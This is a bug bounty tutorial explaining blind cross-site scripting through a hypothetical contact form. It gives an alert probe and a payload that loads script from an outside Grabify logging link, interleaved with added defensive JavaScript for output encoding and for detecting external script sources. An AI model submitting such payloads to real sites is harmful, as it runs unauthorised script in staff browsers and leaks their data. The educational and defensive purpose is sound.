Bug Bounty: Blind XSS Payloads Explained
This article was originally posted on bepractical.tech
Hi everyone! In this article, you will learn how to craft blind XSS payloads to earn bounties. Before we dive deep into this article, let us first learn a few things:
What is XSS(Cross Site Scripting)?
What is Blind XSS?
According to Acunetix, “Blind XSS vulnerabilities are a variant of persistent XSS vulnerabilities. They occur when the attacker input is saved by the web server and executed as a malicious script in another part of the application or in another application”.
In other variants of XSS, we can see the reflected input in the response. However, this is not the case with blind XSS, so we need a different approach in order to find it.
You can learn more about finding XSS vulnerabilities over here.
A Simple Blind XSS Scenario:
Let’s say there is a website contactme.com. The website contains a contact us page. There we have a form with three fields: Name, Email Address and Phone Number. On submitting the form, we see a message “Thank you for contacting us. We will be in touch with you within 24 hrs”. After that, someone from the company logs into their account and sees your details. Using the details, they contact you for further assistance.
Now in this case, no matter what we provide in the form, the only response we will get from the backend is “Thank you for contacting us. We will be in touch with you within 24 hrs”. So here, we cannot use our old payloads to verify the vulnerability, because the injected input is rendered on a page we never see. Instead, we need to craft a different payload. Let’s see how we can do that.
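To make the scenario concrete from the defender's side, here is an added example (not code from the original article, and contactme.com is the article's hypothetical site, not a real target) that models the staff-only inbox rendering a stored submission. The unsafe renderer concatenates stored fields straight into markup, which is exactly what lets a stored field execute in the staff member's browser; the hardened renderer encodes every field at the point of output so the same input becomes visible text.

```javascript
// Added example, not from the original article. Models the contact-form scenario:
// submissions are stored, then rendered into a staff-only page the submitter never
// sees, so the injection is blind from the submitter's side but executes in the
// staff browser. The sample submission is constructed for this example.
const storedSubmission = {
  name: '<script>alert(1)</script>', // the article's basic probe payload in the Name field
  email: 'someone@example.com',
  phone: '555-0100',
};

// VULNERABLE: stored input is concatenated directly into the HTML the staff
// member's browser parses, so a <script> in any field runs when the row is viewed.
function renderSubmissionUnsafe(sub) {
  return `<tr><td>${sub.name}</td><td>${sub.email}</td><td>${sub.phone}</td></tr>`;
}

// Minimal HTML entity encoder for text placed in element content.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// HARDENED: every stored field is encoded at output time, so the browser shows
// the payload as text instead of executing it. Note that the fix lives in the
// page that *displays* the data, not in the form that accepted it.
function renderSubmissionSafe(sub) {
  const cells = [sub.name, sub.email, sub.phone].map(escapeHtml);
  return `<tr>${cells.map((c) => `<td>${c}</td>`).join('')}</tr>`;
}

// Does the rendered markup still contain a live <script> element?
function containsScriptElement(html) {
  return /<script\b/i.test(html);
}

console.log('unsafe output has script element:', containsScriptElement(renderSubmissionUnsafe(storedSubmission)));
console.log('safe output has script element:  ', containsScriptElement(renderSubmissionSafe(storedSubmission)));
```

The point of the comparison is that the form handler can behave identically in both cases (the submitter always gets the same "Thank you" message); whether the payload fires depends entirely on how the internal page that later displays the record encodes it.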
CRAFTING PAYLOAD FOR BLIND XSS
Let’s try to create a very simple payload for XSS, i.e. <script>alert(1)</script>. We all know that it will pop an alert once it is rendered. But in blind XSS, we won’t be able to see the popup. So, we need a payload that lets us observe the result even though we cannot see the response body.
In this article, we are going to use the payload below:
BLIND XSS WITH GRABIFY
Now, let us try to craft a payload with grabify. Follow the steps below:
1- Open Grabify.
2- Type any URL here (google.com) and click on “Create URL”.
3- After that, you will see a screen similar to this:
4- Now, copy the link of “New URL” and paste it inside your payload: <script src="https://grabify.link/9P0OX8"></script>, and use this in the vulnerable web application. If the website is vulnerable, you will see something like below:
Now if we use this payload in the example above, we can successfully achieve blind XSS if the application is vulnerable. This is because once someone from the company tries to view your details, the XSS payload will be executed and you will see the data as shown in the picture.
I hope you understand how we can create blind XSS payloads. If you have any doubts or issues, feel free to comment down below.
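From the application owner's side, the payload above only works because the staff browser is allowed to load a script from an origin the company does not control. The following added example (not from the original article) shows a triage pass a defender could run over stored submissions before anyone opens them: it extracts every <script src> origin in the stored fields, reports those outside the application's own origin (the allowlist and contactme.com are assumptions), and also flags inline scripts and event-handler attributes. The sample rows are constructed.

```javascript
// Added example, not from the original article. Defender-side triage of stored
// contact-form submissions for markup that would execute when a staff member
// views them, with emphasis on <script src=...> pointing at a foreign origin,
// which is the shape of the callback-style payload described in the article.
const OWN_ORIGINS = new Set(['https://contactme.com']); // assumption: the article's hypothetical site

const SCRIPT_SRC_RE = /<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
const INLINE_SCRIPT_RE = /<script\b[^>]*>/i;
const EVENT_HANDLER_RE = /\bon[a-z]+\s*=/i;

// Return the origin of every <script src> in a text field that is not one of ours.
function externalScriptOrigins(text) {
  const origins = [];
  for (const m of String(text).matchAll(SCRIPT_SRC_RE)) {
    try {
      const origin = new URL(m[1]).origin;
      if (!OWN_ORIGINS.has(origin)) origins.push(origin);
    } catch {
      origins.push(`unparseable:${m[1]}`); // relative or malformed src, still worth a look
    }
  }
  return origins;
}

// Classify one stored submission. Returns the reasons it needs review (empty = clean).
function triageSubmission(sub) {
  const findings = [];
  for (const [field, value] of Object.entries(sub)) {
    if (field === 'id') continue;
    const ext = externalScriptOrigins(value);
    for (const o of ext) findings.push(`${field}: loads script from ${o}`);
    if (INLINE_SCRIPT_RE.test(value) && ext.length === 0) findings.push(`${field}: inline <script>`);
    if (EVENT_HANDLER_RE.test(value)) findings.push(`${field}: inline event handler`);
  }
  return findings;
}

// Constructed sample rows, as the staff inbox table might store them.
// tracker.example is a placeholder domain, not a real service.
const sampleSubmissions = [
  { id: 1, name: 'Jane Doe', email: 'jane@example.com', phone: '555-0100' },
  { id: 2, name: '<script src="https://tracker.example/abc"></script>', email: 'x@example.com', phone: '555-0101' },
  { id: 3, name: '<img src=x onerror=alert(1)>', email: 'y@example.com', phone: '555-0102' },
];

function triageAll(rows) {
  return rows.map((r) => ({ id: r.id, findings: triageSubmission(r) }));
}

for (const r of triageAll(sampleSubmissions)) console.log(r.id, r.findings);
```

Pattern matching like this is a review aid, not a fix: output encoding on the internal page (and a Content-Security-Policy whose script-src does not permit arbitrary external origins) is what actually stops the staff browser from running the payload.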